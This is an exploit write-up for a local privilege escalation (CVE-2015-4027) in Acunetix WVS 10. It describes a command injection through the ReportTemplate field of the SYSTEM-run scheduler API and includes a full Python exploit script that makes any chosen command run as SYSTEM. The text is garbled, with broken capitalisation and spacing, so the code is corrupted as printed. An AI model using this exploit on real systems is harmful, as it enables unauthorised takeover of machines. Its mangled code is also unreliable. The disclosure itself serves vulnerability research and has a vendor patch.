Acunetix WVS 10-local Privilege escalation

‘‘‘
========================================================================
Acunetix WVS 10-from Guest to sytem (Local privilege escalation)

cve:cve-2015-4027
Author: (Me) Daniele Linguaglossa
Affected Product:acunetix WVS 10
exploit:local Privilege escalation
Vendor:acunetix Ltd
Remote:no
Version:10
=========================================================================
A local privilege escalation exists in Acunetix WVS, it allow
A local user (even guest) to gain same privilege as System user.

With default Acunetix installation, a service called "ACUWVSSCHEDULERV10"
Would be installed, the this service run as Local System user.

ACUWVSSCHEDULERV10 is reponsable for scan scheduling without user interaction
It expose some API to interact via a Web server usually localhost:8183.

Api:

/listscan
/addscan <== Vulnerable One
/deletescan
etc...

When a user schedule a scan API "Addscan" would be called as following

-------------------------------------------------------------------------------
Post/api/addscan http/1.1
host:localhost:8183
user-agent:mozilla/5.0 (Windows NT 6.1; rv:42.0) gecko/20100101 firefox/42.0
Accept:application/json, Text/javascript, */*; q=0.01
accept-language:it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-encoding:gzip, deflate
Content-type:application/json; Charset=utf-8
Requestvalidated:true
X-requested-with:xmlhttprequest
referer:http://localhost:8183/
content-length:452
Connection:keep-alive
Pragma:no-cache
Cache-control:no-cache

{
"ScanType": "Scan",
"TargetList": "",
"Target": ["http://.target.it"],
"Recurse": "-1",
"Date": "12/2/2015",
"DayOfWeek": "1",
"DayOfMonth": "1",
"Time": "12:21",
"Deleteaftercompletion": "False",
"Params": {
"Profile": "Default",
"Loginseq": "<none>",
"Settings": "Default",
"Scanningmode": "Heuristic",
"Excludedhours": "<none>",
"Savetodatabase": "True",
"Savelogs": "False",
"GenerateReport": "False",
"Reportformat": "PDF",
"ReportTemplate": "Wvsaffecteditemsreport.rep",
"EmailAddress": ""
}
}
------------------------------------------------------------------------------

The first thing I noticed is the reporttemplate, this is used to the Create report
When scanning ends, so it means an external file wich we can control would be and then
Used by system! This would is interesting enough but I never look deep into.
Instead I noticed something even worst, filename is used as argument to Wvs.exe
Called with system privilege!

By looking at what Acunetix handled reporttemplate argument I figured out this was
Possibile to inject custom arguments within reporttemplate
Acunetix help us:D In fact Wvs is provided with a interesting argument it was
/run as reference says:

https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/

Run a command line command during the crawl.
Syntax:/run [command]

Example:/run Curl http://example.com/dir1/

Wow that's really nice and so's order to execute a command we must insert a fake
Crawl followed by a Run command so reporttemplate become:

"ReportTemplate": "Wvsaffecteditemsreport.rep/craw http://fakesite.it/Run cmd.exe"

It worked cmd runned as system!
==================================================================================

Now let ' s PWN this!

escalation.py
‘‘‘

Import Httplib
Import JSON
From datetime import datetime
Import Sys
From time import gmtime, strftime


COMMAND = sys.argv[1] If len (SYS.ARGV) > 1 Else "cmd.exe"
Acuhost = ' 127.0.0.1 '
Acuport = 8183
Acuheaders = {
"Content-type": "Application/json; Charset=utf-8 ",
"X-requested-with": "XMLHttpRequest",
"Accept": "Application/json, Text/javascript, */*; q=0.01 ",
"Requestvalidated": "True"
}
Acuexploit = "/crawl http://www.google.it/Run \" "+ COMMAND +" \ ""
Acudata = {"ScanType": "Scan",
"TargetList": "",
"Target": ["http//" + "A" *2048],
"Recurse": "-1",
"Date": Strftime ("%m/%d/%y", Gmtime ()),
"DayOfWeek": "1",
"DayOfMonth": "1",
"Time": "%s:%s"% (DateTime.Now (). hour, DateTime.Now (). minute+1),
"Deleteaftercompletion": "False",
"params": {"Profile": "Default",
"Loginseq": "<none>",
"Settings": "Default",
"Scanningmode": "Heuristic",
"Excludedhours": "<none>",
"Savetodatabase": "True",
"Savelogs": "False",
"GenerateReport": "False",
"Reportformat": "PDF",
"ReportTemplate": "Wvsdeveloperreport.rep" + Acuexploit,
"EmailAddress": ""}
}

Def sendexploit ():
conn = Httplib. Httpconnection (Acuhost, Acuport)
Conn.request ("POST", "/api/addscan", Json.dumps (Acudata), acuheaders)
RESP = Conn.getresponse ()
Return "%s%s"% (Resp.status, Resp.reason)

Print "Acunetix Wvs Local priviledge escalation by Daniele linguaglossa\n"
print "[+] command:%s would be executed as SYSTEM"% command
print "[+] sending exploit ..."
print "[+]" Result: "+sendexploit ()
print "[+] done!"

‘‘‘
============================================================================

I hope this write-up is funny enough anyway I really would like to thank
Acunetix Product Manager n.s. For the really fast answer and bug mitigation,
Right now a patch exists so hurry up download it now.
============================================================================
‘‘‘

Acunetix WVS 10-local Privilege escalation